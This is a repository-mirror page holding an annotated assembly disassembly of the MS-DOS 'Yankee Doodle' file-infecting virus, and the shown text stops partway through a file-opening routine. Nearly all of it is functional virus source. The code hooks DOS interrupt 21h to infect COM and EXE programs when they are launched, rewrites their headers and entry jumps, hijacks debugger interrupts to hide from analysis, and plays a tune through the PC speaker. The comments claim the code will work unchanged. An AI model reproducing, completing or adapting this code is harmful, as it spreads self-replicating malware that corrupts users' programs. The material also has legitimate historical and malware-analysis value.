Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
71c7752aaa
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.yd23.asm
vxunderground 60045f672b
Add files via upload
2021-01-12 17:26:43 -06:00

1819 lines
48 KiB
NASM
Raw Blame History

;THE YANKEE DOODLE VIRUS
;POOR DISASSEMBLY OF IT MANY REFRENCE MADE AS ABSOLUTE WHEN THEY SHOULD
;BE REFRENCE TO LOCATIONS IN PROGRAM
;WILL WORK IF NO CHANGES MADE TO CODE
;EXCUSE SOME OF THE COMMENTS WHICH MAKE NO SENSE
.RADIX 16
INT01_OFFS EQU 0004
INT03_OFFS EQU 000C
MEM_SIZE EQU 0413
TIMER_HI EQU 006E
TIMER_LO EQU 006C
;******************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
host_code SEGMENT byte
ASSUME CS:host_code, ds:host_code
ORG 0
db 1eh dup (0)
HOST: DB 0B8H, 00H, 4CH, 0CDH
DB '!OS SYS'
DB 7,0,0,0,0
host_code ENDS
vgroup GROUP virus_code
virus_code SEGMENT byte
ASSUME cs:virus_code, ds:virus_code
;data AREA
TOP_VIR: db 0f4h
db 7ah
DB 2Ch ;used as a marker
D003 DB 00
FSIZE1 DW 0000 ;filsize being infected
FSIZE2 DW 0223 ;in bytes hex of course
D1 Dw 0abeh ;used as a marker
TOP_HOST DW 5A4DH ;USED AS A FILE BUFFER
;WHEN FILE IS EXE BELOW IS TRUE
;SIGANATURE
P_SIZE DW 0023 ;LAST PAGE SIZE
P_COUNT DW 0002 ;PAGE COUNT
RELOC DW 0000 ;RELOC TABEL ENTRIES
H_PARA DW 0020 ;#HEADER PARAGRAPHS
MINALLOC DW 0001 ;MIN ALLOC OF MEM
MAXALLOC DW 0FFFF ;MAX ALLOC OF MEM
I_SS DW 0000 ;INTIAL SS
I_SP DW 0000 ;INTIAL SP
CHECKSUM DW 0000 ;CHECKSUM
I_IP DW 0000 ;I_IP PRE INFECTION
I_CS DW 0000 ;I_CS
REL_OFFSET DW 003E ;RELOCATION OFFSET
O_NUM DW 0000 ;OVERLAY NUM
;EXTRA NOT USED DURING EXE
;HEADER READING
REM1 DB 01,00,0FBH,30 ;D0026
;end of top_host buffer
;***********************************************************************
OLD_INT21_OFS DW 109E
OLD_INT21_SEG DW 0116
OLD_INT21_OFS2 DW 109E
OLD_INT21_SEG2 DW 0116
OLD_INT24_OFS DW 0155
OLD_INT24_SEG DW 048Ah
OLD_INT1C_OFS DW 0FF53
OLD_INT1C_SEG DW 0F000
F_HANDLE DW 5 ;3A
F_TIME DW 5002 ;
F_DATE DW 1ACC ;3E
;USED IN VIT INT 1C PART
X1 DW 00DE ;0040
X2 DW 006A ;0042
BUFFER1 DB 2E,83,3E,5E,0C
BUFFER1A DB 0F4,06,70,00
BUFFER2 DB 2E,83,3E,5E,0C
BUFFER2A DB 0F4,06,70,00
SNARE DB 00 ;0056
X4 DB 00
F_ATTR DB 20
PLAY_TUNE DB 01 ;0059
REM2 DB 00 ;005A
COMFILE DB 00
INFEC_FL DB 00
CTRL_FLAG DB 00 ;5D
COUNTER DB 7BH ;5E
X7 DB 01 ;5F
X8 DW 00 ;60
PAGE_16 DW 0010 ;
HOST_IP DW 0100 ;FOR COM FILE INFECTIONS
EXE_PG_SIZE DW 0200 ;
C_OFFSET_21 DW OFFSET CALL_INT21 ;2CFH
X101 DB 0C7,11
X10 DB 0C7,11 ;
X11 DB 0E6,0F ;006E
X12 DB 28,0E ;70
DB 0C7,11 ;72
DB 28,0E ;74
DB 0E6,0F ;76
DB 0C4,17 ;78
DB 0C7,11,0C7,11 ;7a
DB 0E6,0F ;7e
DB 28,0E,0C7,11 ;80
DB 0C7,11,0C7,11 ;84
DB 0C7,11,0E6,0F ;88
DB 28, 0E, 59, 0Dh ;8c
DB 28,0E,0E6,0f ;90
DB 0C7, 11, 0ef, 12
DB 0C4,17
DB 2C,15
DB 0EF
DB 12,0C7
DB 11,0C7
DB 11,2C
DB 15,0EF,12
DB 2C,15
DB 0C5,1A
DB 2C,15
DB 0EF
DB 012,0C7
DB 011,2C
DB 015,0C4,17
DB 02C,15
DB 0C4,17
DB 0C5,1A
DB 67 ;BA
DB 1C,0C5
DB 1A,0C4
DB 17
DB 2C,15
DB 0EF
DB 12,2C
DB 15,0C5,1A
DB 2C,15
DB 0EF
DB 12,0C7
DB 11,2C
DB 15,0C4,17
DB 0C7,11,0EF,12
DB 0E6,00FH
DB 0C7,11,0C7,11
DB 0FF,0FF
DB 05,05,05
DB 05,05,05
DB 05,05,05
DB 05,05,05
DB 09,09
DB 05,05,05
DB 05,05,05
DB 05,05,05
DB 05,05,05
DB 09,09
DB 05,05,05
DB 05,05,05
DB 05,05,05
DB 05,05,05
DB 05,05,06
DB 05,05,05
DB 05,05,05
DB 05,06,05
DB 05,05,05
DB 09,09 ;115
NEW_PONG:
DB 0FEh, 06h, 7Ah, 7Dh ;INC BYTE PTR [7D7A] 0117
DB 0FEH, 06, 0FBH, 7Dh ;INC BYTE PTR [7DFB]
DB 74,05 ;JZ 0126
DB 0EA,00,7C,00,00 ;JMP 0000:7C00
DB 0FC ;CLD
DB 33,0C0 ;XOR AX,AX
DB 8E,0C0 ;MOV ES,AX
DB 0BE, 2Ah, 7Dh ;MOV SI,7D2A
DB 0BF, 4Ch, 00 ;MOV DI,004C
DB 0A5 ;MOVSW
DB 0A5 ;MOVSW
DB 26 ;ES:
DB 83, 06, 13, 04, 02 ;ADD WORD PTR [0413],+02
DB 0EAh, 00, 7Ch, 00, 00 ;JMP 0000:7C00 0139
;DATA ENDS
;******************************************************************
P_MIN_MAX_ALLOC PROC NEAR
;ENTRY SI = 14H = OFFSET MINALLOC
; 16H = OFFSET MAXALLOC
;THIS PROCEDURE ALTERS THE GIVEN VALUES
;TO BE USEFULE TO THE VIRUS WHEN GOING TSR
;by editing the min and max memory requirments
;so that it doesn't need to release mem to go memory resident
MOV AX,[SI]
SUB AX,0BBH
JB TOSMALL
CMP AX,08
NOP
JB TOSMALL
EXIT_MIN_MAX:
MOV [SI],AX
RETN
TOSMALL:
MOV AX,09
JMP short EXIT_MIN_MAX
P_MIN_MAX_ALLOC ENDP
;*************************************************************************
HOOK_1_3 PROC NEAR
;CALLED BY SET_TO_HOOK1_3
; ON ENTRY HAS DI = 44 BX= 4
; DI = 4D BX= C
; DS = CS OF HERE BY VIR INT 1C
PUSH SI
PUSH DS
PUSH CX
PUSH DS
POP ES ;ES POINTS HERE
MOV DS,WORD PTR [X7 + 1] ;APPARENTLY = 0000
;
LDS SI,DWORD PTR [BX] ;loads DS:SI = DS:[bx]
;
MOV WORD PTR ES:[DI+ 5],SI ;
MOV WORD PTR ES:[DI+ 7],DS ;
CMP BYTE PTR [SI],0CFH ;
JE EXIT_HOOK_1_3 ;J17D
;if we get this far hook by manliputaing the vector table
;si = vector for int1 or int3
;int used by debug programs
CLD
MOV CX,0005
REPZ MOVSB
MOV BYTE PTR [SI-05],9A ;flag
MOV WORD PTR [SI-04],OFFSET anti_DEBUG ;a ip 01c3
MOV WORD PTR [SI-02],CS ;a cs
EXIT_HOOK_1_3:
POP CX
POP DS
POP SI
RETN
HOOK_1_3 ENDP
;***************************************************
SET_TO_HOOK1_3 PROC NEAR
;CALLED BY VIR INT 1CH
PUSH BX
PUSH DI
MOV BX,INT01_OFFS ;0004 VECTOR TO INT3
MOV DI,OFFSET BUFFER1 ;0044
CALL HOOK_1_3 ;SET UP HOOK INT 1
MOV BX,INT03_OFFS ;000C VECTOR TO INT3
MOV DI,OFFSET BUFFER2 ;004D
CALL HOOK_1_3 ;SET UP TO HOOK INT 3
POP DI
POP BX
RET
SET_TO_HOOK1_3 ENDP
;*************************************************************************
RESTORE_1_3 PROC NEAR
;ENTRY SI = BUFFER1 ;2E,83,3E,5E,0C F4,06,70,00
; BUFFER2
;NOT SURE WHY BUT IT SEEMS THAT THIS CODE WILL CHECK FOR MEM LOCATION
; 0070:60F4 = 9A,01,C3 IF THERE IT WILL
;RESTORE OF BUFFER1/2 OVER THIS LOCATION WHICH WAS THE ORGINAL
; VECTOR ADDRESS INT
PUSH CX
PUSH DI
LES DI,DWORD PTR [SI+05] ;load this 4 bytes as a mem
;location into es:di
;0070:06f4
CMP BYTE PTR ES:[DI],9A
JNE EXIT_RESTORE_1_3
CMP WORD PTR ES:[DI+01],OFFSET anti_DEBUG
JNE EXIT_RESTORE_1_3
MOV CX,5 ; MOV 5 BYTES
CLD ; FROM DS:[SI]
REPZ MOVSB ; HERE:[BUFFERX]
; TO ES:[DI]
; 0070:06F4
EXIT_RESTORE_1_3:
POP DI
POP CX
RETN
RESTORE_1_3 ENDP
;*************************************************************
SET_TO_REST_1_3 PROC
;THIS PROCEDURE SEEMS TO RESTORE THE THE INT 1 AND 3 TO THERE PROPER
;LOCATIONS IF WE HAVE ALTERED THEM IT CHECK AND CORRECTS THEM
;IN RESTORE_1_3
;CALLED BY VIR INT 1C
PUSH SI
MOV SI,OFFSET BUFFER2
CALL RESTORE_1_3
MOV SI,OFFSET BUFFER1
CALL RESTORE_1_3
POP SI
RETN
SET_TO_REST_1_3 ENDP
;**********************************************************************
;J01C3
;called int 1\ used by debuggers not program is disenfected if
; int 3/ resident and td or debug is used
; BY PUTTING IN TO THE INT VECTOR FOR INT 1 OR AND INT 3
;THE ADDRESS OF THIS SPOT
;BY HOOK_1_3
;
anti_DEBUG PROC ; P_01C3
; A
PUSH BP ; 8
MOV BP,SP ; FLAGS 6
PUSHF ; CS 4
; IP 2
PUSH ES ; BP <-BP
PUSH DS
PUSH BX
PUSH AX
PUSH CS
pop DS
CALL SET_TO_REST_1_3 ;RESTORE PROPER VECTORS
;IF ALTERED WHICH TO GET HERE IT
;ONE OF THEM WOULD HAVE HAD TO BEEN
MOV AX,CS ;this test if the calling
CMP WORD PTR [BP+08],AX ;return to from this is
JE viral_cs ;J020C is our cs
MOV DS,WORD PTR [BP+08]
CMP WORD PTR [BX+OFFSET TOP_VIR+2],2C ; THIS INFO IS LOCATED AT TOP
JNE EXIT_TO_VIR ; OF VIRUS AND MAYBE AT END AS
; END AS WELL
CMP WORD PTR [BX+OFFSET TOP_VIR],7AF4 ;
JNE EXIT_TO_VIR ;
;CMP WORD PTR [BX + 0008h],0ABE
db 81, 0bf, 08, 00, 0be, 0a
JNE EXIT_TO_VIR
MOV AX,DS ; BX /16 BY {4 SHR}
SHR BX,1 ; WHAT WAS IN BX OFFSET OF VIRUS
SHR BX,1 ; BX APPEARS TO POINT TO
SHR BX,1 ; TOP VIRUS
SHR BX,1 ; CS + IP/16 = EA
ADD AX,BX ;
MOV DS,AX ;DS = SOM EFFECTIVE ADDRESS
JMP SHORT viral_cs ;
EXIT_TO_VIR: ;J0201
SUB WORD PTR [BP+02],05
POP AX
POP BX
POP DS
POP ES
POPF
POP BP
RETF
viral_cs:
CALL P_030E
MOV AX,WORD PTR [BP+0A]
INC BYTE PTR [REM2] ;005A IF = 0A FLAGS
TEST AX,0100 ; 08 CS
JNZ J0222 ; 06 IP
DEC WORD PTR [BP+06] ; 4
DEC byte PTR [REM2] ;005A 2
; BP
J0222:
AND AX,0FEFFH ; TURNS OFF IF FLAG
MOV [BP+0A],AX ; IF ON
PUSH CS
POP DS
CALL SET_TO_HOOK1_3 ; THIS CALL SETS UP THE
; INTERUPTS 1 AND 3
; TO GO HERE IF
; THINGS MATCH
POP AX
POP BX
POP DS
POP ES
POPF
POP BP
ADD SP,+04 ;REMOVE LAST 2 PUSH
IRET
anti_DEBUG ENDP
;************************************************************************
VIR_INT_1C PROC
PUSH BP
MOV BP,SP
PUSHF
PUSH AX
PUSH BX
PUSH DS
PUSH ES
PUSH CS
POP DS
CALL SET_TO_REST_1_3 ;AGAIN RESTORES 1 AND 3 INT
; TO PROPER LOCATIONS
;IF NEED BE
CALL SET_TO_HOOK1_3 ;ALTERS THE 1 AND 3 INT
; TO OUR INT HANDLER
;IF SOMETHING IS WRONG
MOV AX,0040
MOV ES,AX
TEST BYTE PTR [COUNTER],07
JNE WRONG_TIME ;J0274
;NOTICE THAT THIS CMP INSTRUCTIONS ARE LOOKING AT 0040:
CMP WORD PTR ES:[TIMER_HI],11 ;
JNE WRONG_TIME ;J0274
CMP WORD PTR ES:[TIMER_LO],00 ;
JNE WRONG_TIME ;J0274
MOV BYTE PTR [PLAY_TUNE],00
MOV WORD PTR [X1],00DE ;0040
MOV WORD PTR [X2],006A ;0042
WRONG_TIME: ;J0274
CMP BYTE PTR [PLAY_TUNE],1 ;01 MEANS NO
JE EXIT_VIR_1C ;J02C4
CMP BYTE PTR [X4],00 ;
JE J0288
DEC BYTE PTR [X4]
JMP SHORT EXIT_VIR_1C
J0288:
MOV BX,[X2]
CMP WORD PTR [BX],0FFFFH
JNE J029E
IN AL,61
AND AL,0FC
OUT 61,AL
MOV BYTE PTR [PLAY_TUNE],01
JMP short EXIT_VIR_1C
J029E:
MOV AL,0B6
OUT 43,AL
MOV AX,[BX]
OUT 42,AL
MOV AL,AH
OUT 42,AL
IN AL,61
OR AL,03
OUT 61,AL
ADD WORD PTR [X2],+02
MOV BX,WORD PTR [X1]
MOV AL,[BX]
DEC AL
MOV BYTE PTR [X4],AL
INC WORD PTR [X1]
EXIT_VIR_1C:
POP ES
POP DS
POP BX
POP AX
POPF
POP BP
JMP DWORD PTR CS:[OLD_INT1C_OFS]
VIR_INT_1C ENDP
;*************************************************************
CALL_INT21: JMP DWORD PTR CS:[OLD_INT21_OFS]
REAL_INT21: JMP DWORD PTR [OLD_INT21_OFS]
;*************************************************************
P_02D8 PROC NEAR
;CALLED BY HANDLE_4B
PUSH BP
MOV BP,SP
CLD
PUSH [BP+0AH]
PUSH [BP+08]
PUSH [BP+04]
CALL P_09C8
ADD SP,+06 ;REMOVE LAST 3 PUSHES
PUSH [BP+0CH]
PUSH [BP+06]
PUSH [BP+08]
CALL P_0A58
ADD SP,+06 ;REMOVE LAST 3 PUSHES
PUSH [BP+0CH]
PUSH [BP+08]
PUSH [BP+06]
PUSH [BP+04]
CALL P_0A7F
ADD SP,+08
POP BP
RETN
P_02D8 ENDP
;**********************************************************************
P_030E PROC
;CALLED BY HANDLE_4B
;CALLED BT VIR INT 1 INT3 IN HIGH MEM
;IN INT 3 1 CASE IT SEEMS
;THAT DX= EA 0F TOP OF VIRUS POSSIBLE
;TO RETURN 5 WORDS IN STACK TOP 3 = FL,CS,IP
;BOTTOM 2 ARE THROWN OUT
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSHF
CLI ;CLEAR IF
MOV AX,8 ;
PUSH AX ;1
MOV AX,00AE ;
PUSH AX ;2
MOV AX,OFFSET VGROUP:BOT_VIR ;B40
MOV CL,04 ;
SHR AX,CL ;
MOV DX,DS ;
ADD AX,DX ;
PUSH AX ;3 END OF VIRUS EA
MOV AX,OFFSET J0AC0 ; 0AC0b
SHR AX,CL ;
ADD AX,DX ;
PUSH AX ;4
MOV AX,0060 ;
SHR AX,CL ;
ADD AX,DX ;
PUSH AX ;5
CALL P_02D8
ADD SP,0AH ;REMOVE LAST 5 PUSHES
POPF
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
P_030E ENDP
;*****************************************************************
WRITE_FILE PROC NEAR
MOV AH,40
jmp short r_w_int21
READ_FILE:
MOV AH,3F
R_W_INT21:
CALL I21_F_HANDLE ;J035C
JB J0357
CMP AX,CX
J0357: RETN
WRITE_FILE ENDP
;******************************************************************
START_FILE PROC NEAR
XOR AL,AL
MOV_F_PTR:
MOV AH,42 ;MOVE FILE PTR
I21_F_HANDLE:
MOV BX,WORD PTR CS:[F_HANDLE]
C2_INT21:
PUSHF
CLI ;CLEAR IF
CALL DWORD PTR CS:[OLD_INT21_OFS2]
RETN
START_FILE ENDP
;*********************************************************************
FORCE_WRITE PROC NEAR
PUSH BX
PUSH AX
MOV BX,WORD PTR CS:[F_HANDLE]
MOV AH,45 ;GET DUPLICATE FILE HANDLE
CALL C2_INT21
JB WRITE_ER ;J0380
MOV BX,AX
MOV AH,3E
CALL C2_INT21
JMP short NO_PROBLEM
WRITE_ER:
CLC ; CLEAR CF
NO_PROBLEM:
POP AX
POP BX
RET
FORCE_WRITE ENDP
;******************************************************************
VIR_INT24:
MOV AL,03
IRET
HANDLE_C603:
;THIS IS THE INSTALATION CHECK CALLED ON BY THE VIRUS
;CHECKS TO SEE IF IN INSTALLED IN MEMORY
;CALLED CF CLEAR, BX SET 002C, AX SET C603
; RETURNS
; IF CF IS SET THEN THEN IT IS INSTALLED
;
MOV AX,02DH
TEST BYTE PTR CS:[X7],02
JNZ J393
DEC AX
J393: CMP BX,AX
XOR AL,AL ;ZEROS AL
RCL AL,1 ;ROTATE LEFT THRU CARRY
;SHIFTS AL 1 BIT TO LEFT THRU CF
;MOVES THE CF BIT INTO AH
PUSH AX
MOV AX,002C
TEST BYTE PTR CS:[X7],04
JNZ J3A6
INC AX
J3A6: CMP BX,AX
LES BX,DWORD PTR CS:OLD_INT21_OFS2
;LOADS ES WITH SEGMENT
; ADDRESS AND BX OFFSET
; IE. ES:BX -> OLD_INT21_OFS
POP AX ;
INC SP ;
INC SP ; SP=SP+2 REMOVE LAST 1 PUSH
; IE. LAST PUSHF
STI ;SET INTERUPT FLAG
RETF 2 ; RETURN TO HOST
;END HANDLE_C603
HANDLE_C600:
;REASON UNKNOW
; DOESN'T SEMM TO BE CALLED BY THIS VIRUS
;
MOV AX,2C
JMP short HANDLE_C5
HANDLE_C601:
;REASON ?
;DOESN'T SEEM TO BE CALLED BY VIRUS
;
MOV AL,BYTE PTR CS:[X7]
XOR AH,AH
JMP short HANDLE_C5
HANDLE_C602:
;REASON ?
;DOESN'T SEEM TO BE CALLED BY VIRUS
;
MOV BYTE PTR CS:[X7],CL
JMP SHORT HANDLE_C5
VIR_INT_21 PROC
PUSHF
CMP AH,4BH ; LOAD EXEC CALL
JZ HANDLE_4B ; LET VIRUS GO
CMP AH,0C5
JZ HANDLE_C5
CMP AX,0C600
JZ HANDLE_C600
CMP AX,0C601
JZ HANDLE_C601
CMP AX,0C602
JE HANDLE_C602
CMP AX,0C603
JE HANDLE_C603
POPF
JMP GOTO_INT21 ;NONE OF OUR INTERRUPTS LET
;DOS INT 21 HANDLE IT
HANDLE_C5:
POPF ; SETS THE MASKABLE INTERUPTS ON
STI ;
STC ; SETS THE CF FLAG
RETF 2 ;
HANDLE_4B:
PUSH AX
XOR AL,AL
XCHG AL,BYTE PTR CS:[INFEC_FL] ;POSSIBLE VAL = 00, FF
;00 OR 00 = 0 ZF SET
;FF OR FF = FF ZF CLEAR
;IF FF CONTINUE TO ATTEMPT
;INFECTION PROCESS
OR AL,AL
POP AX
JNZ CONT
POPF
JMP GOTO_INT21 ;INFEC_FL = 00 SO LET
;DOS HANDLE IT
CONT:
PUSH DS ;SAVE DS = FILE DS
PUSH CS ;SET DS TO CS
POP DS ;TSR INFECTION
CALL P_030E ;
MOV WORD PTR [OFFSET C2_INT21],9090
CALL P_030E ;
POP DS ;RESTORE DS TO FILE DS
PUSH ES ;BP E ;
PUSH DS ;BP C ;SAVE REGS
PUSH BP ;BP A ;THAT MAY BE
PUSH DI
PUSH SI ;BP 8 ; DESTROYED
PUSH DX ;BP 6 ;LATER TO
PUSH CX ;BP 4 ;BE RESTORED
PUSH BX ;BP 2 ;FOR RETURN TI INT 21
PUSH AX ;BP ;
;BP POINTS AT AX
MOV BP,SP
PUSH CS ;DS = TSR INFECTION
POP DS ;
CMP BYTE PTR [REM2],00 ;INFECTED = 00 IF EQUAL
JE J429 ;NOT INFECTED YET
JMP LEAVE_
J429: INC BYTE PTR [COUNTER]
PUSH [BP+0E] ;
PUSH [BP+06] ;
CALL OPEN_FILE
LAHF ;LOAD AH WITH FLAGS
ADD SP,+04 ;REMOVE LAST 2 PUSHS
SAHF ;LOAD FLAGS WITH AH
JNB CHK_FOR_INFEC ;IF NO ERROR
JMP LEAVE_ ;PROBALY ERROR
CHK_FOR_INFEC: ; J440
XOR CX,CX ; SET PTR TO START OF
XOR DX,DX ; VICTIM
CALL START_FILE ;
MOV DX,OFFSET TOP_HOST ;READ 14 BYTES TO
MOV CX,14 ;
CALL READ_FILE ;
JB ALREADY_INFECTED ;ERROR
; USE CHECKSUM TO FIND POSSIBEL WHERE FILE INFECTION OCCURS
; PLACE PTR THERE
MOV AX,WORD PTR [CHECKSUM] ;CHECKSUM * 10
MUL WORD PTR [PAGE_16] ;=0010H DX:AX = ORG_SIZE
MOV CX,DX ;MOV RESULTS INTO CX
MOV DX,AX ;DX
CALL START_FILE ;SET POINTER TO A POINT
;CX:DX FROM START
;WHICH IN A INFECTED FILE
;WOULD BE START OF VIRUS
;READ TO THIS LOCATION FORM FILE
MOV DX,OFFSET TOP_VIR ;READ TO THIS LOCATION
MOV CX,2A ;2A BYTES
CALL READ_FILE ;
JB NOT_INFECTED ;IF ERROR FILE NOT THAT LONG
; CAN'T BE INFECTED
; NOW COMPARE TO SEE IF FILE IS INFECTED
CMP WORD PTR [TOP_VIR],7AF4 ;
JNE NOT_INFECTED ;NOT INFECTED GO INFECT
MOV AX,002C
CMP BYTE PTR [BP+00],00
JNE J483
TEST BYTE PTR [X7],02 ;JUMP IF AN AND OPERATION
JZ J484 ;RESULTS IN ZF SET
J483: INC AX ;
J484: CMP WORD PTR [TOP_VIR+2],AX ;JUMP IF TOP_VIR+2 => AX
JNB ALREADY_INFECTED ;
;FILE IS ALREADY INFECTED RESTORE TO ORGINAL FORM
XOR CX,CX ;SET FILE PTR TO
XOR DX,DX ;ACTUAL START OF
CALL START_FILE ;FILE
MOV DX,OFFSET TOP_HOST ;
MOV CX,20H ;
CALL WRITE_FILE ;
JB ALREADY_INFECTED ;ERROR
CALL FORCE_WRITE ; THIS WOULD EFFECTIVELY
; DISINFECT FILE
JNB J4A4
ALREADY_INFECTED:
JMP CLOSE_EXITVIR ; FILE NOW DISINFECTED
J4A4: MOV CX,WORD PTR [FSIZE1] ;GOTO END OF HOST
MOV DX,WORD PTR [FSIZE2] ;
CALL START_FILE ;
XOR CX,CX ;WRITE 00 BYTES
CALL WRITE_FILE ;IF ERROR
JB ALREADY_INFECTED ;EXIT
CALL FORCE_WRITE
JB ALREADY_INFECTED
;AT THIS TIME THE POSSIBLE INFECTION HAS BEEN REMOVED AND THE FILE RESTORE TO
;ORGIONAL SIZE AND FUNCTION
JMP CHK_FOR_INFEC ;J440
NOT_INFECTED: ;J4BD
MOV AL,02
MOV CX,0FFFF
MOV DX,0FFF8
CALL MOV_F_PTR
MOV DX,OFFSET TOP_HOST ;BUFFER TO READ INTO
MOV CX,08H ;FOR LENGTH
CALL READ_FILE
JB ERROR_LVE
CMP WORD PTR [P_COUNT],7AF4 ;IF == MAYBE INFECTED
JE MAKE_SURE ;J4E0
JMP SHORT INFECT ;J538
ERROR_LVE:
JMP CLOSE_EXITVIR ;J6AE
MAKE_SURE:
CMP BYTE PTR [RELOC],23 ; IF >=
JNB ERROR_LVE ;IT IS INFECTED
MOV CL,BYTE PTR [RELOC+1] ; ????
MOV AX,WORD PTR [TOP_HOST] ; POSSIBLE SETING UP JUMP
MOV WORD PTR [FSIZE2],AX ; FOR COM FILE
MOV AX,WORD PTR [P_SIZE] ;
SUB AX,0103H ; WHY 103
MOV WORD PTR [TOP_HOST+1],AX ;
CMP BYTE PTR [RELOC],09 ;
JA J503 ;
MOV CL,0E9 ;
J503: MOV BYTE PTR [TOP_HOST],CL ;E9= JMP
XOR CX,CX ;
MOV DX,CX ;
CALL START_FILE ;
MOV DX,OFFSET TOP_HOST ;
MOV CX,0003H ;
CALL WRITE_FILE ;
JB ERROR_LVE ;J4DD
CALL FORCE_WRITE
JB ERROR_LVE ;J4DD
XOR CX,CX ;SET FILE POINTER TO END
MOV DX,WORD PTR [FSIZE2] ;OF HOST FILE
CALL START_FILE ;
XOR CX,CX
CALL WRITE_FILE
JB ERROR_EXIT
;52E
CALL FORCE_WRITE
JB ERROR_EXIT
JMP NOT_INFECTED ;J4BD
ERROR_EXIT: JMP CLOSE_EXITVIR ;J6AE
;J538
INFECT:
MOV WORD PTR [TOP_VIR],7AF4
MOV WORD PTR [TOP_VIR+2],2C
MOV WORD PTR [TOP_VIR+8],0ABE
CMP BYTE PTR [BP+00],00
JNE ERROR_EXIT ;J535
TEST BYTE PTR [X7],01
JE ERROR_EXIT
;THIS NEXT PIECE WILL TELL POINTER TO GO TO END OF FILE
;WITH OFFSET 0:0 WHICH SETS DX:AX TO #BYTES IN ENTIRE FILE
;J557
MOV AL,02
XOR CX,CX
MOV DX,CX
CALL MOV_F_PTR
MOV [FSIZE1],DX
MOV [FSIZE2],AX
XOR CX,CX
MOV DX,CX
CALL START_FILE
MOV DX,OFFSET TOP_HOST ;BUFFER
MOV CX,20 ;#BYTES TO READ
CALL READ_FILE ;
JB ERROR_EXIT ;J535
;CHECK FOR TYPE OF FILE BY TESTING FOR SIGNATURE MZ OR ZM
;IF NEITHER IT IS A COM FILE
;J579
CMP WORD PTR [TOP_HOST],"ZM"
JE EXE_INFEC
CMP WORD PTR [TOP_HOST],"MZ"
JNE COM_INFEC
EXE_INFEC:
MOV BYTE PTR [COMFILE],00
MOV AX,WORD PTR [P_COUNT] ;000E
MUL WORD PTR [EXE_PG_SIZE] ;0066 = 200H
SUB AX,[FSIZE2] ;AX=#BYTES IN HOST
SBB DX,[FSIZE1] ;IF BELOW ERROR SOMEPLACE
JB J5E1 ;J5E1 EXIT ERROR
MOV AX,WORD PTR [I_SS] ;0018
MUL WORD PTR [PAGE_16] ;0062
ADD AX,WORD PTR [I_SP] ;001A
MOV CX,DX ;SAVE RESULT EFF ADDRESS OF
MOV BX,AX ;SS:SP AT START OF PROGRAM
MOV AX,[H_PARA] ;0012
MUL WORD PTR [PAGE_16] ;0062
MOV DI,WORD PTR [FSIZE1]
MOV SI,WORD PTR [FSIZE2]
ADD SI,+0F
ADC DI,+00
AND SI,-10
SUB SI,AX
SBB DI,DX
MOV DX,CX
MOV AX,BX
SUB AX,SI
SBB DX,DI
JB J5FF
;J5D4
ADD SI,0DC0
ADC DI,+00
SUB BX,SI
SBB CX,DI
JNB J5FF ;IF NO ERROR
J5E1: JMP CLOSE_EXITVIR ;J6AE
COM_INFEC: ;j5E4
MOV BYTE PTR [COMFILE],01 ; CHECK IF FILE SIZE
CMP WORD PTR [FSIZE1],+00 ; WILL ALLOW INFECTION
JNZ J5E1 ;
CMP WORD PTR [FSIZE2],+20 ;
JBE J5E1 ;
CMP WORD PTR [FSIZE2],0F277 ;
JNB J5E1 ;
J5FF:
MOV CX,WORD PTR [FSIZE1] ; FIGURE END OF FILE
MOV DX,WORD PTR [FSIZE2] ; +DATA NEEDED TO GET IT TO
ADD DX,+0F ;A EVEN PAGE IE DIVISIBLE BY 10H
ADC CX,+00 ;
AND DX,-10 ;
CALL START_FILE ;
XOR DX,DX
MOV CX,0B41 ;OFFSET TOP_VIRUS -OFFSET BOT_VIRUS+1
PUSH word ptr [x7]
MOV BYTE PTR [x7],01
CALL WRITE_FILE
POP CX
MOV BYTE PTR [x7],CL
JB J5E1
CMP BYTE PTR [COMFILE],00
JE EXEINFEC ;J638
MOV CX,0004 ; WRITES FIRST 4 BYTES
CALL WRITE_FILE ; TO END OF FILE
EXEINFEC:
CALL FORCE_WRITE ; FA 7A 2C 00
JB J5E1
MOV DX,WORD PTR [FSIZE1]
MOV AX,[FSIZE2]
ADD AX,000F
ADC DX,+00
AND AX,0FFF0
DIV WORD PTR [PAGE_16]
MOV WORD PTR[CHECKSUM],AX
CMP BYTE PTR [COMFILE],00
JE EXEONLY
;DO THIS TO COM FILE ONLY
MUL WORD PTR [PAGE_16]
MOV BYTE PTR [TOP_HOST],0E9
ADD AX,07CE
MOV [TOP_HOST+1],AX
JMP SHORT J069E
EXEONLY: ;66C
MOV [I_CS],AX
MOV WORD PTR [I_IP],07D1 ;OFFSET START
MUL WORD PTR [PAGE_16]
ADD AX,OFFSET VGROUP:BOT_VIR ;B40
ADC DX,+00
DIV WORD PTR [EXE_PG_SIZE]
INC AX
MOV WORD PTR [P_COUNT],AX
MOV WORD PTR [P_SIZE],DX
MOV AX,WORD PTR [H_PARA]
SUB WORD PTR [I_CS],AX
;J692: SET MIN_MALLOC
MOV SI,OFFSET MINALLOC
CALL P_MIN_MAX_ALLOC
MOV SI,OFFSET MAXALLOC
CALL P_MIN_MAX_ALLOC
J069E: XOR CX,CX
MOV DX,CX
CALL START_FILE
MOV DX,OFFSET TOP_HOST
MOV CX,20
CALL WRITE_FILE
CLOSE_EXITVIR: ;J6AE
PUSH [BP+0E]
PUSH [BP+06]
CALL CLOSE_F
;J6B7
ADD SP,+04 ;REMOVE LAST 2 PUSH
LEAVE_:
MOV BYTE PTR [INFEC_FL],0FF
POP AX
POP BX
POP CX
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
POPF
GOTO_INT21: ;J6C9
PUSHF
PUSH CS ; FLAG <- BP +6
PUSH WORD PTR CS:[C_OFFSET_21] ; CS <- BP +4
CMP BYTE PTR CS:[REM2],00 ; IP <- BP +2
JNE J6D9 ; OLDBP <- BP =SP
IRET ;
J6D9: PUSH BP
MOV BP,SP
OR WORD PTR [BP+06],0100 ;SETS TRAP FLAG ON
;RETURN
MOV BYTE PTR CS:[REM2],00
POP BP
IRET
VIR_INT_21 ENDP
; C
OPEN_FILE PROC ; A
PUSH BP ; FLAG 8
MOV BP,SP ; CS 6
PUSH ES ; IP 4
PUSH DX ; BP 2
PUSH CX ;BP->
PUSH BX
PUSH AX
